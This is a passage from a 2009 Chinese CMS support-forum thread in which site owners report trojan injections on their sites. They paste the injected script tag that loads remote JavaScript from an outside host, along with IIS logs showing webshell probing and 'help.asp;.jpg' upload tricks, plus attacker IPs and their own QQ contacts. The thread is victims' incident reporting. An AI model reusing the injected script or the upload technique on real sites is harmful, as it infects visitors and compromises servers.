针对此次挂马事件官方已联合部分受害用户报警!请广大站长参与!-领先建站CMS提供服务商我们专注于CMS建站产品的研发

反对(0)

顶端

底部

mbaun 当前离线

1138 主题	4 广播	1 粉丝

级别:八年级

用户积分:6229 分
登录次数:342 次
注册时间:2006/4/4
最后登录:2023/2/2

mbaun 发表于：2009/9/15 21:38:00 | 只看该作者查看该作者主题 52楼

在12日凌晨0：40 还是V5.5 121.32.187.2这个广州的IP

不过当时我就把文件删除了

科汛商学院助您快速入门

反对(0)

顶端

底部

aliuzhiguo 当前离线

6 主题	0 广播	0 粉丝

级别:学前班

用户积分:238 分
登录次数:4 次
注册时间:2009/7/8
最后登录:2009/9/16

aliuzhiguo 发表于：2009/9/15 17:09:00 | 只看该作者查看该作者主题 53楼

做考试题库就用#科汛在线考试系统!

我的也被挂了，不知道咂搞啊？

网站：www.gzaiyue.com

qq:19884770

做官网就用科汛智能建站系统!

反对(0)

顶端

底部

szhaoyue 当前离线

68 主题	0 广播	0 粉丝

级别:学前班

用户积分:1109 分
登录次数:74 次
注册时间:2008/11/23
最后登录:2010/5/10

szhaoyue 发表于：2009/9/15 16:53:00 | 只看该作者查看该作者主题 54楼

w 我的是虚拟主机。昨天晚上（2009/9/14当时我正在后台管理）大概9点挂马。

A http://www.meiem.org （15号把程序FTP打包下来后换了新的5.52） http://cn.pcy.me (V6测试站--现在还没去解决)

Q 760220110

K 我只知道好多页面脚底多了个：<script language="JavaScript" type="text/javascript" src="http://www.cuaa.net/member/member/file/ruxin.%6As" id="seraph5script9750" ></script>

反对(0)

顶端

底部

shixt 当前离线

102 主题	0 广播	0 粉丝

级别:一年级

用户积分:938 分
登录次数:83 次
注册时间:2007/6/5
最后登录:2022/8/25

shixt 发表于：2009/9/15 22:16:00 | 只看该作者查看该作者主题 55楼

这个ip 203.171.226.178

做新职业技能培训平台就选#科汛网校

反对(0)

顶端

底部

shixt 当前离线

102 主题	0 广播	0 粉丝

级别:一年级

用户积分:938 分
登录次数:83 次
注册时间:2007/6/5
最后登录:2022/8/25

shixt 发表于：2009/9/15 22:13:00 | 只看该作者查看该作者主题 56楼

科汛商学院助您快速入门

反对(0)

顶端

底部

dech 当前离线

588 主题	4 广播	0 粉丝

级别:五年级

用户积分:4726 分
登录次数:358 次
注册时间:2007/12/18
最后登录:2013/11/29

dech 发表于：2009/9/15 15:20:00 | 只看该作者查看该作者主题 57楼

有生源找课程就上科汛课堂街!

我的网站正在恢复,因为被迫移动空间,访问资料不全: 被挂马时间:9月11日23点以后,网址:chinaxr.net 黑客来路ip地址是:123.54.122.150(河南省焦作市电信）

做官网就用科汛智能建站系统!

反对(0)

顶端

底部

7256504 当前离线

617 主题	1 广播	0 粉丝

级别:六年级

用户积分:6143 分
登录次数:538 次
注册时间:2007/3/15
最后登录:2018/9/7

7256504 发表于：2009/9/15 13:56:00 | 只看该作者查看该作者主题 58楼

他总在鼓捣我的网站！

2009-09-14 15:23:18 W3SVC26943 428C119E5D3B4D6 211.152.51.63 POST /bbs/boke/Images/sex/help.asp;.jpg - 80 - 222.245.220.131 HTTP/1.1 - - http://www.cds12355.com/bbs/boke/Images/sex/help.asp;.jpg www.cds12355.com 200 0 0 218 307 234
2009-09-14 15:23:43 W3SVC26943 428C119E5D3B4D6 211.152.51.63 POST /Template/rss.asp nor=0&en=0&asp=0&dot=1 80 - 222.245.220.131 HTTP/1.1 - - http://www.cds12355.com/Template/rss.asp?nor=0&en=0&asp=0&dot=1 www.cds12355.com 200 0 0 417 8055 24187

传了很多help.asp;.jpg！！！

反对(0)

顶端

底部

7256504 当前离线

617 主题	1 广播	0 粉丝

级别:六年级

用户积分:6143 分
登录次数:538 次
注册时间:2007/3/15
最后登录:2018/9/7

7256504 发表于：2009/9/15 13:53:00 | 只看该作者查看该作者主题 59楼

有生源找课程就上科汛课堂街!

接上楼：

2009-09-14 11:37:41 W3SVC26943 428C119E5D3B4D6 211.152.51.63 POST /bbs/Dv_plus/flashget/help.asp;.jpg - 80 - 222.245.213.129 HTTP/1.1 - - http://www.cds12355.com/bbs/Dv_plus/flashget/help.asp;.jpg www.cds12355.com 200 0 0 218 309 218

还是222.245.213.129 湖南省怀化市电信

做考试题库就用#科汛在线考试系统!

反对(0)

顶端

底部

7256504 当前离线

617 主题	1 广播	0 粉丝

级别:六年级

用户积分:6143 分
登录次数:538 次
注册时间:2007/3/15
最后登录:2018/9/7

7256504 发表于：2009/9/15 13:50:00 | 只看该作者查看该作者主题 60楼

1：iis日志：

2009-09-14 02:06:26 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /admin/rfmashell.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 115 46
2009-09-14 02:06:26 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /admin/shell.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 111 46
2009-09-14 02:06:26 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /admin/shell.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 111 46
2009-09-14 02:06:27 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /maxhdiy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 107 46
2009-09-14 02:06:27 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /diy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 103 46
2009-09-14 02:06:27 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /diy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 103 31
2009-09-14 02:06:27 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /admin/fgiydiy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 113 31
2009-09-14 02:06:27 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /admin/diy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 109 31
2009-09-14 02:06:27 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /admin/diy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 109 31
2009-09-14 02:06:27 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /inc/ecbgdiy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 111 31
2009-09-14 02:06:27 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /inc/diy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 107 31
2009-09-14 02:06:30 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /inc/diy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 107 2984
2009-09-14 02:06:51 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /upload/tdwndiy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 114 15
2009-09-14 02:06:51 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /upload/diy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 110 31
2009-09-14 02:06:51 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /upload/diy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 110 31
2009-09-14 02:06:52 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /upfile/dvrcdiy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 114 31
2009-09-14 02:06:52 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /upfile/diy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 110 31
2009-09-14 02:06:52 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /upfile/diy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 110 31
2009-09-14 02:06:52 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /uploadfiles/splmdiy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 119 62
2009-09-14 02:06:52 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /uploadfiles/diy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 115 31
2009-09-14 02:06:52 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /uploadfiles/diy.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 115 31
2009-09-14 02:06:52 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /bbs/loadtree1.asp boardid=79&rootid=379&action=1 80 - 203.208.60.19 HTTP/1.1 Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) - - www.cds12355.com 200 0 0 3286 278 93
2009-09-14 02:06:52 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /inc/aqgzposha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 113 31
2009-09-14 02:06:52 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /inc/posha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 109 31
2009-09-14 02:06:52 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /inc/posha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 109 31
2009-09-14 02:06:52 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /english/aiodposha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 117 31
2009-09-14 02:06:52 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /english/posha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 113 31
2009-09-14 02:06:55 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /english/posha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 113 3078
2009-09-14 02:06:55 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /upload/bdbdposha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 116 31
2009-09-14 02:06:55 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /upload/posha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 112 31
2009-09-14 02:06:55 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /upload/posha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 112 31
2009-09-14 02:06:56 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /upfile/myuaposha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 116 31
2009-09-14 02:06:56 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /upfile/posha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 112 31
2009-09-14 02:06:56 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /upfile/posha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 112 31
2009-09-14 02:06:56 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /uploadfiles/unxqposha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 121 31
2009-09-14 02:06:56 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /uploadfiles/posha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 117 31
2009-09-14 02:06:56 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /uploadfiles/posha.asp - 80 - 222.35.142.77 HTTP/1.1 Mozilla/4.0 - - www.cds12355.com 200 0 0 1221 117 31
2009-09-14 02:16:46 W3SVC26943 428C119E5D3B4D6 211.152.51.63 POST /Template/rss.asp - 80 - 222.245.220.112 HTTP/1.1 - - http://www.cds12355.com/Template/rss.asp www.cds12355.com 200 0 0 294 297 250
2009-09-14 02:16:47 W3SVC26943 428C119E5D3B4D6 211.152.51.63 POST /bbs/boke/Images/manage/inedx.asp - 80 - 222.245.220.112 HTTP/1.1 - - http://www.cds12355.com/bbs/boke/Images/manage/inedx.asp www.cds12355.com 200 0 0 294 305 312
2009-09-14 02:16:47 W3SVC26943 428C119E5D3B4D6 211.152.51.63 POST /bbs/boke/Edit_Plus/FCKeditor/editor/plugins/placeholder/lang/bottum.asp - 80 - 222.245.220.112 HTTP/1.1 - - http://www.cds12355.com/bbs/boke/Edit_Plus/FCKeditor/editor/plugins/placeholder/lang/bottum.asp www.cds12355.com 200 0 0 294 383 265
2009-09-14 02:16:47 W3SVC26943 428C119E5D3B4D6 211.152.51.63 POST /bbs/boke/Skins/dvskin/C00N.asp - 80 - 222.245.220.112 HTTP/1.1 - - http://www.cds12355.com/bbs/boke/Skins/dvskin/C00N.asp www.cds12355.com 200 0 0 294 301 156
2009-09-14 02:16:48 W3SVC26943 428C119E5D3B4D6 211.152.51.63 POST /bbs/boke/Edit_Plus/FCKeditor/editor/_source/help.asp;.jpg - 80 - 222.245.220.112 HTTP/1.1 - - http://www.cds12355.com/bbs/boke/Edit_Plus/FCKeditor/editor/_source/help.asp;.jpg www.cds12355.com 200 0 0 218 355 203
2009-09-14 02:16:50 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET / t=6761 80 - 222.245.220.112 HTTP/1.1 - - - www.cds12355.com 200 0 0 50867 49 1375
2009-09-14 02:16:50 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /houtai t=157 80 - 222.245.220.112 HTTP/1.1 - - - www.cds12355.com 200 0 0 395 54 109
2009-09-14 02:16:50 W3SVC26943 428C119E5D3B4D6 211.152.51.63 GET /houtai/ t=157 80 - 222.245.220.112 HTTP/1.1 - - - www.cds12355.com 200 0 0 2536 55 265
2009-09-14 02:17:14 W3SVC26943 428C119E5D3B4D6 211.152.51.63 POST /Template/rss.asp nor=0&en=0&asp=0&dot=1 80 - 222.245.220.112 HTTP/1.1 - - http://www.cds12355.com/Template/rss.asp?nor=0&en=0&asp=0&dot=1 www.cds12355.com 200 0 0 412 8055 23687

攻击ip一：222.35.142.77 （北京市铁通）可疑！是否在试探我的目录？

攻击ip：222.245.220.112 （湖南省怀化市电信）在论坛里上传了一个help.asp;.jpg 文件，但是我刚才看的时候是0字节，不知为何？

目前网站已经广泛被挂马。。。打不开了

2、常德市12355青少年服务台

3、www.cds12355.com

4、qq：9777597

其它日志消息正在查找。。。